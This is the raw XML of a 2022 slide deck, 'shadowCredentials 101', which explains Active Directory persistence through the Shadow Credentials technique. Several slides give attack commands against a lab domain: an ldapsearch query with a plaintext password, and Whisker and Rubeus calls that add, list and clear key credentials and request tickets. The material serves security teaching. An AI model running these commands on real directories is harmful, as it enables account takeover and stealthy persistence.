            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350258" y="1649895"/>
            <a:ext cx="11439838" cy="4168277"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any unprivileged user can read the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of any user in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Powershell Script to audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>generated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ROCA-vulnerable TPMs</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>ldapsearch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-LLL -x "(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=*)" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -H ldap://EvilDC1 -D "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>TheHorseman@EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>" -w EvilCorp3. -b dc=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>EvilCorp,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=local</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3629901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8849" y="342569"/>
            <a:ext cx="8825659" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>NLTM?</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518849" y="1066800"/>
            <a:ext cx="8825659" cy="2362200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they need to access resources that require NTLM authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>client can obtain a special service ticket containing its NTLM hash inside the PAC, in a field called NTLM_SUPPLEMENTAL_CREDENTIAL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To do so, it makes a TGS-REQ (U2U) request, i.e. it requests a service ticket from itself to itself.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593789" y="3127513"/>
            <a:ext cx="3137326" cy="3524909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694900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73" y="459509"/>
            <a:ext cx="8825659" cy="741218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Joined</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702373" y="1450109"/>
            <a:ext cx="10972391" cy="4535055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> Whisker.exe:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Whisker.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>target:TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>domain:EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>dc:EvilDC1.EvilCorp.local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	- Whisker.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>target:TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>domain:EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>dc:EvilDC1.EvilCorp.local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	- Rubeus.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>asktgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>user:TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>certificate:ADSDADSAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t> of a target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	- Whisker.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>target:TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>domain:EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>dc:EVILDC1.EvilCorp.local 			/remove:2de4643a-2e0b-438f-a99d-5cb058b3254b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clear all the values of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of a target object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	- Whisker.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>target:TheHorseman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1"/>
              <a:t>domain:EvilCorp.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0"/>
              <a:t> /dc:EVILDC1.EvilCorp.local </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20490738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ersonalizado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FFFFFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FFFFF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2506</TotalTime>
  <Words>469</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>74</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Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion</vt:lpstr>
      <vt:lpstr>AD Persistence methods:</vt:lpstr>
      <vt:lpstr>Active directory persistence methods</vt:lpstr>
      <vt:lpstr>Shadow Credentials</vt:lpstr>
      <vt:lpstr>The Bug</vt:lpstr>
      <vt:lpstr>WINDOWS HELLO FOR BUSINNESS</vt:lpstr>
      <vt:lpstr>Cert-Trust vs Key-Trust</vt:lpstr>
      <vt:lpstr>Public, is public.</vt:lpstr>
      <vt:lpstr>NLTM?</vt:lpstr>
      <vt:lpstr>From Domain Joined</vt:lpstr>
      <vt:lpstr>Non-Domain Joined</vt:lpstr>
      <vt:lpstr>The guys with the Galaxy brain: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shadowCredentials 101</dc:title>
  <dc:creator>Ray</dc:creator>
  <cp:lastModifiedBy>Ray</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-30T13:57:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-20T14:04:46Z</dcterms:modified>
</cp:coreProperties>
</file>